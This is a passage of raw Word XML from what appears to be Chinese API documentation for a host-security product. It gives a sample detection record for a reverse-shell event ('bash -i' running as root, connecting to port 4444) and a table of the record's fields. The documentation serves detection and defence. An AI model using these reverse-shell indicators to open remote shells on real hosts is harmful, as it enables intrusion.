        <w:t xml:space="preserve">            "hostname": "oldtcm",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "createTime": 1525935820,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pid": 21794,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "processName": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "targetIp": "192.168.98.136",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "targetPort": 4444,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "userName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "currentPath": "/root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "groupName": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "parentPid": 44382,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "parentName": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "parentPath": "/bin/bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "stdInfo": "stdin,stderr,stdout",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "processTree": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/sbin/init",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "name": "init",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "/sbin/init"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 1097,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/usr/sbin/sshd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "sshd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "/usr/sbin/sshd -D "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 1097,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 44340,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/usr/sbin/sshd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "name": "sshd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "sshd: root@pts/19    "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 44340,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 44382,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/bin/bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "-bash "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "userName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "uid": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ppid": 44382,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pid": 21794,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/bin/bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "name": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "groupName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fileMode": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "euidUserName": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "cmd": "bash -i "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D9F846"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694"/>
        <w:gridCol w:w="2042"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3032"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7F9A6CA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F16404A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23AD2CD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="459D819B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4681E0D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="66D6E33A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6247C58B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76725536" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B3BF227" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65C58D9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="005AC6F0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CD8196F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6954B0B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="710BF37B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7288ACD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="715230E9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="358EA627" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C88EC27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BD86F0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69295296" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5F5E50CA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="792B547A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E54B3A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="627CAD5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64139C41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="051C1CBF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="404E33CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1325C77E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B62F0F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DC2CC16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2EE7F482" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22877A12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4262BE3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6128D864" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="770250F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B873787" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="139BF9AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C5D1D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D0EF758" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4233E28E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="33C8D7AC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D6A1CFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE72C25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31954243" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="461BCE5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4CDCBA26" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B06AE10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A5067B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49A7B165" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="414D4855" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A79B40E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ADE1267" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>createTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4474E803" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F598D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FF4B969" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A39F6EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69FD5ECA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="382A6631" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D9F347A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FACFB84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F113040" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CC2EB96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>processName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CD4E59B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E795EEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="413B67FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B5CE0C6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7174CAD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>targetIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28964770" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="283F697B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23BE6CB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>目标主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="472258A2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1527EC4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>targetPort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37A09CFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27B3620A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
